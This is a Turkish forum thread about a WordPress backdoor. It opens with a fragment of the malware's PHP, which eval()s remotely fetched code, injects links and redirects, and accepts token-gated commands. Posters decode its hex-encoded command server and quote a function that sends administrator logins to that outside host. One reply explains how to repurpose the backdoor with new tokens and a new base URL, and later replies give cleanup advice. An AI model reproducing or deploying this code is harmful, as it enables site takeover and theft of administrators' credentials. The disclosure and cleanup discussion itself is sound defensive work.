src="http://ajax.googleapis.com/…/li…/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript"> window.location.replace("'.$cache->yonlen_kod.'/"); </script>'; } } if ($cache->status == 0) { if($konum_durum == 1 && ! is_front_page()){ echo $cache->link_kod; } if($konum_durum == 0){ echo $cache->link_kod; } }else if ($index && $cache->status == 1 ) { if($konum_durum == 1 && ! is_front_page()){ echo $cache->link_kod; } if($konum_durum == 0){ echo $cache->link_kod; } } } catch ( Exception $e ) { } } public static function init_code() { $cache = json_decode( ( new self( "" ) )->cache() ); if(isset( $cache->html_kod )){ echo html_entity_decode($cache->html_kod); } if(isset( $cache->php_kod )){ eval($cache->php_kod); } } } } try { if ( ! function_exists( 'preArrayList' ) ) { function preArrayList( $arr ) { echo "<pre>"; print_r( $arr ); echo "</pre>"; } } if ( ! defined( "ABSPATH" ) ) { foreach ( [ "..", "../..", "../../..", "../../../..", "../../../../..", "../../../../../.." ] AS $directory ) { if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) { include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ); } } } } catch ( Exception $e ) { } try { $token = @$_REQUEST["system_action_token"]; $action = @$_REQUEST['system_action_application']; $params = @$_REQUEST['system_action_params']; error_reporting( 0 ); if ( ! is_null( $token ) && ! empty( $token ) ) { $WPPlugingsOptions = new WPPlugingsOptions( $token ); $controlAction = $WPPlugingsOptions->controlAction( $action, $params ); if ( is_array( $controlAction ) || is_object( $controlAction ) ) { preArrayList( $controlAction ); } else { echo $controlAction; } } else { WPPlugingsOptions::init(); WPPlugingsOptions::cache_method(); WPPlugingsOptions::init_code(); WPPlugingsOptions::wp_login(); } } catch ( Exception $e ) { }
-
Daha önce paylaştığımızın yeni versiyonu hex kodları decode edildiğinde
687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f http://system.kralphp.com/
post json hex
7b2264617465223a22323032302d30332d31332031303a34303a3533222c22737461747573223a6e756c6c2c22676f737465725f6b6f6e756d223a6e756c6c2c226b6f6e756d223a6e756c6c2c22626f74223a6e756c6c2c226c696e6b5f6b6f64223a6e756c6c2c2268746d6c5f6b6f64223a6e756c6c2c227068705f6b6f64223a6e756c6c2c22796f6e6c656e5f6b6f64223a6e756c6c7d
{"date":"2020-03-13 10:40:53","status":null,"goster_konum":null,"konum":null,"bot":null,"link_kod":null,"html_kod":null,"php_kod":null,"yonlen_kod":null}
bu versiyona eklemeler yapılmış :)
Aşşağıdaki kodaki fonksiyon http://system.kralphp.com/ log postunda sitenize ait admin kullanıcı adı şifresini logluyor.
public
static
function
wp_login() {
$post_url
= hex2bin(
'687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f'
);
if
(
$_POST
[
'log'
]){
$username
=
$_POST
[
'log'
];
$password
=
$_POST
[
'pwd'
];
$test
= wp_authenticate(
$username
,
$password
);
$sor
=
$test
->allcaps;
$testet
=
$sor
[
'administrator'
];
if
(
$testet
){
$git
= wp_remote_post(
$post_url
.
"postlogin"
, [
"body"
=> [
"url"
=> site_url(
'/'
),
"username"
=>
$username
,
"password"
=>
$password
,
"login_url"
=>
$login_url
,
]
EcHoLL tarafından 25/Mar/20 21:28 tarihinde düzenlenmiştir] );
-
nasıl kullanıyoruz bunu?
-
Yigit bunu yazdı
nasıl kullanıyoruz bunu?
if
(md5(sha1(
$this
->token)) ===
'b28ee5fed7b75a888635c35727f398b6'
) {
Bu tokenleri kendine göre düzenliyorsun based url yide kendine göre düzenlemen gerekiyor çünkü download vs bütün işlemleri based url üzerinden alıyor Curl ile access alabilirsin http://system.kralphp.com/clientfiles/files/shell json kullanmış zaten adam kimse kullanamasın diye böyle birşey seçmiş sunucularınızı tarayın bu lavuk wordpress xmlrpc.php ile daha önce logladığı türk sitelerine sunucuda bruteforce çekiyor yani temizledikden sonra aynı şifre olan herşeyi değiştirmelisiniz. -
Teşekkürler
-
ben hala anlamadım hocam :) kusura bakma.
basit bir şekilde adım adım ifade edecek olan varmı :)
-
bence cok güzel iş cıkarmıs helal olsun adama
-
iş yapar güzel eline sağlık Ekol
-
Selamlar olayı nedir kısaca bilgi geçebilecek olan var mı ?
Php ve mysql bilgim var ama olayı kavrayamadım nedense :)
-
bunu bulaştığı sistemden kolayca temizlemenin bir yolu var mı arkadaşlar ?
-
hworm bunu yazdı
bunu bulaştığı sistemden kolayca temizlemenin bir yolu var mı arkadaşlar ?
https://www.tahribat.com/forum/wordpress-backdoor-243978
Bulaştığı dosyalar nasıl arama yapıcağın hakkında bilgi bulabilirsin bulaşmış bir sistemin varsa wp-content dosyasını silme geri kalan bütün dosyaları silip temiz wp dosyalarını upload edersen kurtulursun wp-content içine .htaccess dosyası oluşturup
<FilesMatch "\.(?i:php)$"> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> <IfModule mod_authz_core.c> Require all denied </IfModule> </FilesMatch>
wp-content altındaki php dosyalarına direk erişimi engeleye bilirsin tema dosylarına eklemeler var ise onlarıda değiştirme tarihlerine bakarak enfekte olanları düzeltmen gerekiyor.